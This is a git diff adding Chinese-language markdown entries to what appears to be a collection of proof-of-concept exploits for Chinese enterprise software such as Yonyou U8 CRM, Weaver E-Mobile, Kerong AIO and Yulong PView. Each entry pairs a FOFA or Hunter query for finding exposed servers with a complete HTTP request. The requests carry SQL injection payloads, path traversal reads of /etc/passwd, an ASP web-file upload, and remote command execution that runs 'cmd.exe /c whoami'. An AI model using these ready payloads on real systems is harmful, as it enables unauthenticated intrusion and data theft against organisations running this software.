diff --git "a/\346\225\260\345\255\227\351\200\232OA/\346\225\260\345\255\227\351\200\232\344\272\221\345\271\263\345\217\260\346\231\272\346\205\247\346\224\277\345\212\241workflow\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/\346\225\260\345\255\227\351\200\232OA/\346\225\260\345\255\227\351\200\232\344\272\221\345\271\263\345\217\260\346\231\272\346\205\247\346\224\277\345\212\241workflow\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..855d104
--- /dev/null
+++ "b/\346\225\260\345\255\227\351\200\232OA/\346\225\260\345\255\227\351\200\232\344\272\221\345\271\263\345\217\260\346\231\272\346\205\247\346\224\277\345\212\241workflow\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
@@ -0,0 +1,43 @@
+# 数字通云平台智慧政务workflow存在SQL注入漏洞
+
+数字通云平台 智慧政务 /workflow/query/index 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+
+```java
+body="assets/8cca19ff/css/bootstrap-yii.css"
+```
+
+## poc
+
+获取cookie
+
+```javascript
+POST /portal/default/login HTTP/1.1
+Host:
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Priority: u=0, i
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Content-Type: application/x-www-form-urlencoded
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+
+userID=admin&flag=rone
+```
+
+携带cookie进行注入
+
+```javascript
+GET /workflow/query/index?WfRtApplication%5Bselect_user%5D=1%20AND%20%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x71786b7a71%2C%28SELECT%20%28ELT%285761=5761%2C1%29%29%29%2C0x7162717871%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29 HTTP/1.1
+Host:
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Priority: u=0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+Cookie: your-cookie
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept: */*
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409181346234.png)
\ No newline at end of file
diff --git "a/\346\263\233\345\276\256OA/\346\263\233\345\276\256E-Mobile\347\263\273\347\273\237\346\216\245\345\217\243cdnfile\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md" "b/\346\263\233\345\276\256OA/\346\263\233\345\276\256E-Mobile\347\263\273\347\273\237\346\216\245\345\217\243cdnfile\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..8b9218d
--- /dev/null
+++ "b/\346\263\233\345\276\256OA/\346\263\233\345\276\256E-Mobile\347\263\273\347\273\237\346\216\245\345\217\243cdnfile\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\350\257\273\345\217\226\346\274\217\346\264\236.md"
@@ -0,0 +1,33 @@
+# 泛微E-Mobile系统接口cdnfile存在任意文件读取漏洞
+
+泛微E-Mobile client/cdnfile 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件、数据库配置文件等等。
+
+## fofa
+
+```javascript
+app="泛微-EMobile"
+```
+
+## poc
+
+```javascript
+GET /client/cdnfile/1C/Windows/win.ini?windows HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+```
+
+```javascript
+GET /client/cdnfile/C/etc/passwd?linux HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+```
+
+![image-20240919111430590](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409191114676.png)
\ No newline at end of file
diff --git "a/\347\201\265\345\275\223CRM/\347\201\265\345\275\223CRM\347\263\273\347\273\237\346\216\245\345\217\243getOrderList\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/\347\201\265\345\275\223CRM/\347\201\265\345\275\223CRM\347\263\273\347\273\237\346\216\245\345\217\243getOrderList\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..2b007bc
--- /dev/null
+++ "b/\347\201\265\345\275\223CRM/\347\201\265\345\275\223CRM\347\263\273\347\273\237\346\216\245\345\217\243getOrderList\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
@@ -0,0 +1,23 @@
+# 灵当CRM系统接口getOrderList存在SQL注入漏洞
+
+灵当CRM系统接口getOrderList存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。
+
+## fofa
+
+```javascript
+body="crmcommon/js/jquery/jquery-1.10.1.min.js" || (body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js")
+```
+
+## poc
+
+```javascript
+GET /crm/WeiXinApp/marketing/index.php?module=WxOrder&action=getOrderList&crm_user_id=1%20AND%20(SELECT%209552%20FROM%20(SELECT(SLEEP(5)))x) HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+```
+
+![image-20240919111854302](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409191119991.png)
\ No newline at end of file
diff --git "a/\347\224\250\345\217\213OA/\347\224\250\345\217\213U8-CRM\347\263\273\347\273\237chkService.php\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/\347\224\250\345\217\213OA/\347\224\250\345\217\213U8-CRM\347\263\273\347\273\237chkService.php\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..a1bab1d
--- /dev/null
+++ "b/\347\224\250\345\217\213OA/\347\224\250\345\217\213U8-CRM\347\263\273\347\273\237chkService.php\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
@@ -0,0 +1,29 @@
+## 用友U8-CRM系统chkService.php存在SQL注入漏洞
+
+用友U8-CRM系统 /ajax/chkService.php 文件存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。
+
+## hunter
+
+```jade
+app.name="用友 CRM"
+```
+
+## fofa
+
+```jade
+title="用友U8CRM"
+```
+
+## poc
+
+```javascript
+GET /ajax/chkService.php?Action=chkAccountNumExists&accountNum=1%27;WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Cookie: PHPSESSID=bgsesstimeout-;
+Connection: close
+```
+
diff --git "a/\347\224\250\345\217\213OA/\347\224\250\345\217\213U8-Cloud\347\263\273\347\273\237\346\216\245\345\217\243AddTaskDataRightAction\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/\347\224\250\345\217\213OA/\347\224\250\345\217\213U8-Cloud\347\263\273\347\273\237\346\216\245\345\217\243AddTaskDataRightAction\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..5cd8953
--- /dev/null
+++ "b/\347\224\250\345\217\213OA/\347\224\250\345\217\213U8-Cloud\347\263\273\347\273\237\346\216\245\345\217\243AddTaskDataRightAction\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
@@ -0,0 +1,23 @@
+# 用友U8-Cloud系统接口AddTaskDataRightAction存在SQL注入漏洞
+
+用友U8-Cloud系统接口AddTaskDataRightAction存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。
+
+## fofa
+
+```java
+app="用友-U8-Cloud"
+title=="U8C"
+```
+
+## poc
+
+```javascript
+GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.task.AddTaskDataRightAction&method=execute&strTaskID=1%27);WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409081935783.png)
diff --git "a/\347\224\250\345\217\213OA/\347\224\250\345\217\213U8CRM\347\263\273\347\273\237\346\216\245\345\217\243relobjreportlist.php\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/\347\224\250\345\217\213OA/\347\224\250\345\217\213U8CRM\347\263\273\347\273\237\346\216\245\345\217\243relobjreportlist.php\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..b3806e0
--- /dev/null
+++ "b/\347\224\250\345\217\213OA/\347\224\250\345\217\213U8CRM\347\263\273\347\273\237\346\216\245\345\217\243relobjreportlist.php\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
@@ -0,0 +1,28 @@
+# 用友U8CRM系统接口relobjreportlist.php存在SQL注入漏洞
+
+用友U8 CRM 客户关系管理系统 config/relobjreportlist.php 文件存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。
+
+## fofa
+
+```javascript
+title="用友U8CRM"
+```
+
+## hunter
+
+```javascript
+app.name="用友 CRM"
+```
+
+## poc
+
+```javascript
+POST /config/relobjreportlist.php HTTP/1.1
+Host:
+Content-Type: application/x-www-form-urlencoded
+Cookie: PHPSESSID=bgsesstimeout-;
+
+DontCheckLogin=1&Action=CheckRelUser&typeID=1&objType=1&ids=1');WAITFOR DELAY '0:0:5'--
+```
+
+![image-20240918135123639](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409181351732.png)
\ No newline at end of file
diff --git "a/\347\247\221\350\215\243AIO/\347\247\221\350\215\243AIO\347\263\273\347\273\237\346\216\245\345\217\243UtilServlet\345\255\230\345\234\250\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md" "b/\347\247\221\350\215\243AIO/\347\247\221\350\215\243AIO\347\263\273\347\273\237\346\216\245\345\217\243UtilServlet\345\255\230\345\234\250\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..b4f6323
--- /dev/null
+++ "b/\347\247\221\350\215\243AIO/\347\247\221\350\215\243AIO\347\263\273\347\273\237\346\216\245\345\217\243UtilServlet\345\255\230\345\234\250\344\273\243\347\240\201\346\211\247\350\241\214\346\274\217\346\264\236.md"
@@ -0,0 +1,25 @@
+# 科荣AIO系统接口UtilServlet存在代码执行漏洞
+
+科荣AIO UtilServlet 存在远程代码执行漏洞,攻击者通过漏洞可以获取服务器权限,导致服务器失陷。
+
+## fofa
+
+```javascript
+body="changeAccount('8000')"
+```
+
+## poc
+
+```javascript
+POST /UtilServlet HTTP/1.1
+Host:127.0.0.1
+User-Agent:Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/534.57.2(KHTML, like Gecko)Version/5.1.7Safari/534.57.2
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length:322
+
+operation=calculate&value=BufferedReader+br+%3d+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec("cmd.exe+/c+whoami").getInputStream()))%3bString+line%3bStringBuilder+b+%3d+new+StringBuilder()%3bwhile+((line+%3d+br.readLine())+!%3d+null)+{b.append(line)%3b}return+new+String(b)%3b&fieldName=example_field
+```
+
+![920396433c98be57376c249f469ae450](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409111012822.png)
\ No newline at end of file
diff --git "a/\347\253\240\347\256\241\345\256\266-\345\215\260\347\253\240\346\231\272\346\205\247\347\256\241\347\220\206\345\271\263\345\217\260/\347\253\240\347\256\241\345\256\266list.htm\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/\347\253\240\347\256\241\345\256\266-\345\215\260\347\253\240\346\231\272\346\205\247\347\256\241\347\220\206\345\271\263\345\217\260/\347\253\240\347\256\241\345\256\266list.htm\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..496d49e
--- /dev/null
+++ "b/\347\253\240\347\256\241\345\256\266-\345\215\260\347\253\240\346\231\272\346\205\247\347\256\241\347\220\206\345\271\263\345\217\260/\347\253\240\347\256\241\345\256\266list.htm\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
@@ -0,0 +1,27 @@
+# 章管家list.htm存在SQL注入漏洞
+
+章管家 department/list.htm 接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
+
+## fofa
+
+```javascript
+body="章管家登录-公章在外防私盖"
+```
+
+## poc
+
+```javascript
+POST /app/department/list.htm HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+
+token=dingtalk_token&person_id=1&unit_id=1&id=' or SL EEP(6) or '
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409132236104.png)
\ No newline at end of file
diff --git "a/\347\275\221\345\276\241-ACM-\344\270\212\347\275\221\350\241\214\344\270\272\347\256\241\347\220\206\347\263\273\347\273\237/\347\275\221\345\276\241-ACM-\344\270\212\347\275\221\350\241\214\344\270\272\347\256\241\347\220\206\347\263\273\347\273\237bottomframe.cgi-SQL-\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/\347\275\221\345\276\241-ACM-\344\270\212\347\275\221\350\241\214\344\270\272\347\256\241\347\220\206\347\263\273\347\273\237/\347\275\221\345\276\241-ACM-\344\270\212\347\275\221\350\241\214\344\270\272\347\256\241\347\220\206\347\263\273\347\273\237bottomframe.cgi-SQL-\346\263\250\345\205\245\346\274\217\346\264\236.md"
deleted file mode 100644
index 2ef29fe..0000000
--- "a/\347\275\221\345\276\241-ACM-\344\270\212\347\275\221\350\241\214\344\270\272\347\256\241\347\220\206\347\263\273\347\273\237/\347\275\221\345\276\241-ACM-\344\270\212\347\275\221\350\241\214\344\270\272\347\256\241\347\220\206\347\263\273\347\273\237bottomframe.cgi-SQL-\346\263\250\345\205\245\346\274\217\346\264\236.md"
+++ /dev/null
@@ -1,4 +0,0 @@
-## 网御 ACM 上网行为管理系统bottomframe.cgi SQL 注入漏洞
-```
-/bottomframe.cgi?user_name=%27))%20union%20select%20md5(1)%23
-```
diff --git "a/\347\275\221\345\276\241\346\230\237\344\272\221/\347\275\221\345\276\241ACM\344\270\212\347\275\221\350\241\214\344\270\272\347\256\241\347\220\206\347\263\273\347\273\237bottomframe.cgi\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/\347\275\221\345\276\241\346\230\237\344\272\221/\347\275\221\345\276\241ACM\344\270\212\347\275\221\350\241\214\344\270\272\347\256\241\347\220\206\347\263\273\347\273\237bottomframe.cgi\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..78213b4
--- /dev/null
+++ "b/\347\275\221\345\276\241\346\230\237\344\272\221/\347\275\221\345\276\241ACM\344\270\212\347\275\221\350\241\214\344\270\272\347\256\241\347\220\206\347\263\273\347\273\237bottomframe.cgi\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
@@ -0,0 +1,17 @@
+## 网御ACM上网行为管理系统bottomframe.cgi存在SQL注入漏洞
+
+网御 ACM上网行为管理系统 bottomframe.cgi 存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库敏感信息
+
+## fofa
+
+```
+app="网御星云-上网行为管理系统"
+```
+
+## poc
+
+```javascript
+/bottomframe.cgi?user_name=%27))%20union%20select%20md5(1)%23
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409191348040.png)
diff --git "a/\347\275\221\345\276\241\346\230\237\344\272\221/\347\275\221\345\276\241VPN\345\256\211\345\205\250\347\275\221\345\205\263\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\344\270\213\350\275\275\346\274\217\346\264\236(CNVD-2024-34014).md" "b/\347\275\221\345\276\241\346\230\237\344\272\221/\347\275\221\345\276\241VPN\345\256\211\345\205\250\347\275\221\345\205\263\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\344\270\213\350\275\275\346\274\217\346\264\236(CNVD-2024-34014).md"
new file mode 100644
index 0000000..1386fbb
--- /dev/null
+++ "b/\347\275\221\345\276\241\346\230\237\344\272\221/\347\275\221\345\276\241VPN\345\256\211\345\205\250\347\275\221\345\205\263\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\344\270\213\350\275\275\346\274\217\346\264\236(CNVD-2024-34014).md"
@@ -0,0 +1,22 @@
+# 网御VPN安全网关存在任意文件下载漏洞(CNVD-2024-34014)
+
+网御VPN安全网关存在任意文件下载漏洞,攻击者可利用该漏洞在未经身份验证的情况下下载passwd等敏感文件。
+
+## poc
+
+```javascript
+GET /SSL/admin/UserFile?FileName=../../../etc/passwd HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/UXujNlADrykn2NSREuwDWQ
+- [国家信息安全漏洞共享平台 (cnvd.org.cn)](https://www.cnvd.org.cn/flaw/show/CNVD-2024-34014)
\ No newline at end of file
diff --git "a/\350\252\211\351\276\231\346\225\260\345\255\227/\350\252\211\351\276\231\350\247\206\351\237\263\351\242\221\347\273\274\345\220\210\347\256\241\347\220\206\345\271\263\345\217\260FindById\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/\350\252\211\351\276\231\346\225\260\345\255\227/\350\252\211\351\276\231\350\247\206\351\237\263\351\242\221\347\273\274\345\220\210\347\256\241\347\220\206\345\271\263\345\217\260FindById\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..fca1010
--- /dev/null
+++ "b/\350\252\211\351\276\231\346\225\260\345\255\227/\350\252\211\351\276\231\350\247\206\351\237\263\351\242\221\347\273\274\345\220\210\347\256\241\347\220\206\345\271\263\345\217\260FindById\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
@@ -0,0 +1,26 @@
+# 誉龙视音频综合管理平台FindById存在SQL注入漏洞
+
+誉龙视音频综合管理平台 RelMedia/FindById 存在SQL注入漏洞,未经身份验证的远程攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。
+
+## fofa
+
+```javascript
+body="PView 视音频管理平台"
+```
+
+## poc
+
+```javascript
+POST /index.php?r=RelMedia/FindById HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+
+id=1+and+updatexml(1,concat(0x7e,user(),0x7e),1)--+
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409162102180.png)
+
diff --git "a/\350\252\211\351\276\231\346\225\260\345\255\227/\350\252\211\351\276\231\350\247\206\351\237\263\351\242\221\347\273\274\345\220\210\347\256\241\347\220\206\345\271\263\345\217\260TimeSyn\345\255\230\345\234\250\350\277\234\347\250\213\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md" "b/\350\252\211\351\276\231\346\225\260\345\255\227/\350\252\211\351\276\231\350\247\206\351\237\263\351\242\221\347\273\274\345\220\210\347\256\241\347\220\206\345\271\263\345\217\260TimeSyn\345\255\230\345\234\250\350\277\234\347\250\213\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..ecd414a
--- /dev/null
+++ "b/\350\252\211\351\276\231\346\225\260\345\255\227/\350\252\211\351\276\231\350\247\206\351\237\263\351\242\221\347\273\274\345\220\210\347\256\241\347\220\206\345\271\263\345\217\260TimeSyn\345\255\230\345\234\250\350\277\234\347\250\213\345\221\275\344\273\244\346\211\247\350\241\214\346\274\217\346\264\236.md"
@@ -0,0 +1,25 @@
+# 誉龙视音频综合管理平台TimeSyn存在远程命令执行漏洞
+
+誉龙视音频综合管理平台TimeSyn存在远程命令执行漏洞,未经身份验证的远程攻击者在目标服务器上执行任意系统命令,可能导致服务器被完全控制、数据泄露或破坏,严重威胁系统安全。
+
+## fofa
+
+```javascript
+body="PView 视音频管理平台"
+```
+
+## poc
+
+```javascript
+POST /index.php?r=Third/TimeSyn HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+
+cloudKey=0x0&date=|cmd.exe+/c+whoami+>+1.txt&time=1
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409162103838.png)
\ No newline at end of file
diff --git "a/\350\267\257\347\224\261\345\231\250/AC\351\233\206\344\270\255\347\256\241\347\220\206\345\271\263\345\217\260\346\234\252\346\216\210\346\235\203\346\274\217\346\264\236.md" "b/\350\267\257\347\224\261\345\231\250/AC\351\233\206\344\270\255\347\256\241\347\220\206\345\271\263\345\217\260\346\234\252\346\216\210\346\235\203\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..2c08669
--- /dev/null
+++ "b/\350\267\257\347\224\261\345\231\250/AC\351\233\206\344\270\255\347\256\241\347\220\206\345\271\263\345\217\260\346\234\252\346\216\210\346\235\203\346\274\217\346\264\236.md"
@@ -0,0 +1,29 @@
+# AC集中管理平台未授权漏洞
+
+多款AC集中管理平台、智能AC管理系统、智能路由系统(HTTPD-AC1.0服务)均被发现存在严重的未授权访问安全漏洞。此漏洞允许攻击者未经授权地直接访问多个data文件,进而非法获取包括AC用户名、密码、SSID(服务集标识符)、AP BSSID(接入点基站标识符)等在内的敏感及关键信息,对系统安全构成重大威胁。
+
+## fofa
+
+```javascript
+header="HTTPD_ac 1.0"
+```
+
+## poc
+
+```javascript
+GET /actpt.data HTTP/1.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cache-Control: max-age=0
+Connection: keep-alive
+Host:
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
+```
+
+![2564642ff99c1ab0e34d89aaf507ef65](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409171614315.png)
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/C7YKQlMtzWhC29M3F17CiQ
\ No newline at end of file
diff --git "a/\351\241\272\346\231\257ERP/\351\241\272\346\231\257ERP\347\256\241\347\220\206\347\263\273\347\273\237UploadInvtSpFile\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240\346\274\217\346\264\236.md" "b/\351\241\272\346\231\257ERP/\351\241\272\346\231\257ERP\347\256\241\347\220\206\347\263\273\347\273\237UploadInvtSpFile\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..d7ccb12
--- /dev/null
+++ "b/\351\241\272\346\231\257ERP/\351\241\272\346\231\257ERP\347\256\241\347\220\206\347\263\273\347\273\237UploadInvtSpFile\345\255\230\345\234\250\344\273\273\346\204\217\346\226\207\344\273\266\344\270\212\344\274\240\346\274\217\346\264\236.md"
@@ -0,0 +1,33 @@
+# 顺景ERP管理系统UploadInvtSpFile存在任意文件上传漏洞
+
+顺景ERP管理系统UploadInvtSpFile存在任意文件上传漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。
+
+## fofa
+
+```javascript
+body="/api/DBRecord/getDBRecords"
+```
+
+## poc
+
+```javascript
+POST /api/cgInvtSp/UploadInvtSpFile HTTP/1.1
+Host:
+Content-Type: multipart/form-data; boundary=-----------------1111
+Content-Length: 178
+
+-------------------1111
+Content-Disposition: form-data; name="filedata"; filename="2142142142.asp"
+Content-Type: image/png
+
+<% response.write("1111")%>
+-------------------1111--
+```
+
+![ebb92616e1835d80e80f6c6cb97ee814](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409111921995.png)
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/BrbgHxUO4GJ0Haza5xf6dQ
\ No newline at end of file
diff --git "a/\351\255\205\346\200\235\350\247\206\351\242\221\347\256\241\347\220\206\347\263\273\347\273\237/\351\255\205\346\200\235\350\247\206\351\242\221\347\256\241\347\220\206\347\263\273\347\273\237getOrderStatus\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md" "b/\351\255\205\346\200\235\350\247\206\351\242\221\347\256\241\347\220\206\347\263\273\347\273\237/\351\255\205\346\200\235\350\247\206\351\242\221\347\256\241\347\220\206\347\263\273\347\273\237getOrderStatus\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
new file mode 100644
index 0000000..f508750
--- /dev/null
+++ "b/\351\255\205\346\200\235\350\247\206\351\242\221\347\256\241\347\220\206\347\263\273\347\273\237/\351\255\205\346\200\235\350\247\206\351\242\221\347\256\241\347\220\206\347\263\273\347\273\237getOrderStatus\345\255\230\345\234\250SQL\346\263\250\345\205\245\346\274\217\346\264\236.md"
@@ -0,0 +1,21 @@
+# 魅思视频管理系统getOrderStatus存在SQL注入漏洞
+
+魅思视频管理系统getOrderStatus存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。
+
+## fofa
+
+```javascript
+app="魅思-视频管理系统"
+```
+
+## poc
+
+```javascript
+POST /api/getOrderStatus HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+user-agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
+
